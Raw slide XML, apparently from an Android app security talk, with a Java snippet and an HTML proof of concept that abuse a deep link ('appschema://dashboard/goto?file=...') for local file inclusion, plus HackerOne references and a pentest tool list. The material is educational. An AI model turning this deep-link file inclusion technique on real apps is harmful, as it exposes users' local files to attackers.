              <a:t>private</a:t>
            </a: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static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="539900"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="539900"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>searchFolderRecursive</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5B88D2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>File</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folder</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if</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folder</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null</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if</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folder</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listFiles</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null</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for</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5B88D2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>File</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file</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folder</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listFiles</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if</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file</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isFile</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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>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file</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getName</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contains</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".pdf"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>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lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="5B88D2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Uri</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uri</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5B88D2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Uri</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parse</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"appschema://dashboard/goto?file=/sdcard/Android/data/com.example/appdirectory/"</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file</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getName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>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lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="5B88D2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Intent</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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </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new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="5B88D2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="5B88D2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Intent</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ACTION_VIEW</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uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>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startActivity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>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lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="5B88D2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Log</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v</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"Got a file!"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="D76464"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"File = " </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>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file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="D76464"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>getName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>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 }</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="9877D4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>else</a:t>
            </a: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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>searchFolderRecursive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr sz="8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000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>                }</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000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>            }</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000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        }</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000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    }</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sz="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Proof of concept with html </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;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&lt;a href=”appschema://dashboard/goto?file=/sdcard/Android/data/com.example/appdirectory/test.pdf”&gt;Test LFI&lt;/a&gt;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&lt;/html&gt;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1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p35"/>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Deep Link LFI Example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Some examples based on:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/200427</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/258460</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/272044</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Tool resources:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/skylot/jadx</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://developer.android.com/studio/command-line/adb</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://github.com/sensepost/objection</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://github.com/FSecureLABS/drozer</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://sqlitebrowser.org/</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p36"/>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Resources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311700" y="837200"/>
            <a:ext cx="8520600" cy="40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rPr>
              <a:t>Android Studio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - PoC development, Emulators, Check for debugging info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jadx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Decompile apks and source code review </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - (Android Debug Bridge)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Patching apks without rooted device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Drozer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - Map out attack surface, useful functions</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DB Browser for SQLite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>View what is stored in SQLite databases</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - After patching apk, installing cert on device</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom Bash scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automate the redundant tasks</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cell Phones</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -  Galaxy S10e, test phone J3 Orbit, Android Studio emulator</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Google Shape;74;p15"/>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Android Workflow</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b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AndroidManifest.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (basically a blueprint for the application)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
